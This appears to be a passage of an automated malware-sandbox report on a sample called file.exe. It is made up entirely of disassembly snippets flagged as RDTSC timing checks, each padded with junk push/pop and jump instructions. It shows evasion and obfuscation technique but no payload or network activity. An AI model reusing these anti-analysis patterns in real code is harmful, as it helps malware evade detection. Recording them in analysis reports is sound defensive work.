    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6952F second address: B695A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD14683Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007FB4CD146849h 0x00000010 nop 0x00000011 movzx ebx, si 0x00000014 movzx edi, cx 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FB4CD146838h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov bx, ax 0x00000036 push 00000000h 0x00000038 pushad 0x00000039 sub dword ptr [ebp+122D2F78h], edx 0x0000003f jmp 00007FB4CD14683Ch 0x00000044 popad 0x00000045 xchg eax, esi 0x00000046 jl 00007FB4CD14683Eh 0x0000004c push ecx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6B5D0 second address: B6B5D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A7AF second address: B6A7B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6B5D4 second address: B6B5E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FB4CD3D7AA6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6B5E8 second address: B6B5EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA55FD second address: BA5614 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD146843h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA573D second address: BA5751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007FB4CD3D7AACh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA589E second address: BA58A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA58A4 second address: BA58B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA58B3 second address: BA58C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD14683Eh 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA59FE second address: BA5A39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD3D7AB2h 0x00000007 jmp 00007FB4CD3D7AB9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007FB4CD3D7AACh 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5B72 second address: BA5B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5B78 second address: BA5B7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5CDA second address: BA5CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5CDE second address: BA5CE8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5CE8 second address: BA5CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5CEE second address: BA5CF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA85EC second address: BA860E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB4CD146842h 0x00000008 jmp 00007FB4CD14683Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA860E second address: BA863B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jc 00007FB4CD3D7AA6h 0x0000000e jmp 00007FB4CD3D7AB4h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA863B second address: BA863F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA863F second address: BA8662 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB4CD3D7AA6h 0x00000008 js 00007FB4CD3D7AA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB4CD3D7AAFh 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA8662 second address: BA8668 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA817E second address: BA8182 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA8182 second address: BA818B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA818B second address: BA8190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA8190 second address: BA8196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA8196 second address: BA819A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA819A second address: BA81B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FB4CD14683Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB0B39 second address: BB0B45 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB4CD3D7AA6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB0B45 second address: BB0B52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FB4CD146836h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB0B52 second address: BB0B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB0B5A second address: BB0B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB4CD146836h 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push esi 0x0000000e push ebx 0x0000000f jng 00007FB4CD146836h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB0C9E second address: BB0CA3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB0CA3 second address: BB0CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jno 00007FB4CD146842h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007FB4CD146836h 0x00000018 je 00007FB4CD146836h 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB0E9E second address: BB0EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB0EA2 second address: BB0EBE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB4CD146836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007FB4CD146836h 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 jo 00007FB4CD146836h 0x0000001b popad 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB0EBE second address: BB0EE8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB4CD3D7AACh 0x00000008 jg 00007FB4CD3D7AA6h 0x0000000e pushad 0x0000000f jnp 00007FB4CD3D7AA6h 0x00000015 jmp 00007FB4CD3D7AB3h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB1178 second address: BB1181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB1181 second address: BB1186 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB1186 second address: BB11B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD146845h 0x00000009 jmp 00007FB4CD146845h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB11B6 second address: BB11E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 js 00007FB4CD3D7AA6h 0x0000000c pushad 0x0000000d popad 0x0000000e jo 00007FB4CD3D7AA6h 0x00000014 ja 00007FB4CD3D7AA6h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jnc 00007FB4CD3D7AACh 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66094 second address: B66098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66098 second address: B660FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD3D7AAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FB4CD3D7AA8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 mov edi, ecx 0x00000028 mov ch, F6h 0x0000002a jmp 00007FB4CD3D7AB3h 0x0000002f push 00000004h 0x00000031 mov dword ptr [ebp+12453884h], ecx 0x00000037 nop 0x00000038 js 00007FB4CD3D7ABCh 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FB4CD3D7AAEh 0x00000045 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB14DC second address: BB14F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4CD146843h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB14F5 second address: BB14F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB14F9 second address: BB14FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB209E second address: BB20B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FB4CD3D7AAFh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB20B5 second address: BB20CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD14683Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB20CD second address: BB20D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB20D3 second address: BB20D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6446 second address: BB6451 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FB4CD3D7AA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6813 second address: BB682F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB4CD146846h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6AE4 second address: BB6AEE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB4CD3D7AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA1D0 second address: BBA1DA instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB4CD146836h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA1DA second address: BBA1E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBA1E0 second address: BBA209 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FB4CD146836h 0x00000009 jl 00007FB4CD146836h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB4CD146845h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB98E8 second address: BB98EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB98EF second address: BB9911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push esi 0x00000008 jg 00007FB4CD146836h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB4CD14683Dh 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9911 second address: BB991B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB4CD3D7AA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9A5C second address: BB9A80 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jc 00007FB4CD146836h 0x0000000d pop ecx 0x0000000e popad 0x0000000f pushad 0x00000010 jns 00007FB4CD14683Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9A80 second address: BB9A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9A84 second address: BB9AA0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FB4CD146841h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB9ED4 second address: BB9EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB4CD3D7AA6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f jmp 00007FB4CD3D7AB3h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0CC6 second address: BC0CCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0FF2 second address: BC0FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC0FF8 second address: BC0FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC15B4 second address: BC15E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB4CD3D7AB9h 0x0000000c jl 00007FB4CD3D7AA6h 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC15E2 second address: BC1608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FB4CD146850h 0x00000010 jmp 00007FB4CD146844h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC1608 second address: BC161C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB4CD3D7AB0h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC18B4 second address: BC18B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC1E4A second address: BC1E6D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB4CD3D7AAEh 0x00000008 jns 00007FB4CD3D7AA6h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB4CD3D7AAFh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC1E6D second address: BC1E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC23C0 second address: BC23C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC26C9 second address: BC26DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB4CD146836h 0x0000000a pop eax 0x0000000b jo 00007FB4CD14683Eh 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC5D18 second address: BC5D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC6270 second address: BC6275 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC63DB second address: BC6410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 je 00007FB4CD3D7AA6h 0x0000000b jne 00007FB4CD3D7AA6h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jno 00007FB4CD3D7AC0h 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC653C second address: BC655B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD146846h 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD428F second address: BD42E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4CD3D7AABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FB4CD3D7AAEh 0x0000000f popad 0x00000010 pushad 0x00000011 jno 00007FB4CD3D7ACBh 0x00000017 pushad 0x00000018 jl 00007FB4CD3D7AA6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD25BB second address: BD25BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD25BF second address: BD25CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FB4CD3D7AA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2B91 second address: BD2B9B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB4CD146836h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2B9B second address: BD2BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 ja 00007FB4CD3D7AAEh 0x0000000e push edx 0x0000000f je 00007FB4CD3D7AA6h 0x00000015 pop edx 0x00000016 jmp 00007FB4CD3D7AAFh 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FB4CD3D7AB0h 0x00000022 jmp 00007FB4CD3D7AB2h 0x00000027 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2BEC second address: BD2BF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2D11 second address: BD2D15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD312E second address: BD3141 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jp 00007FB4CD146836h 0x0000000c popad 0x0000000d pop esi 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD32A5 second address: BD32AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD32AC second address: BD32CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007FB4CD14683Ah 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2042 second address: BD2050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 js 00007FB4CD3D7AA6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2050 second address: BD207D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB4CD146836h 0x0000000a popad 0x0000000b pop edi 0x0000000c pushad 0x0000000d jmp 00007FB4CD146841h 0x00000012 ja 00007FB4CD14683Ch 0x00000018 ja 00007FB4CD146836h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD207D second address: BD2083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
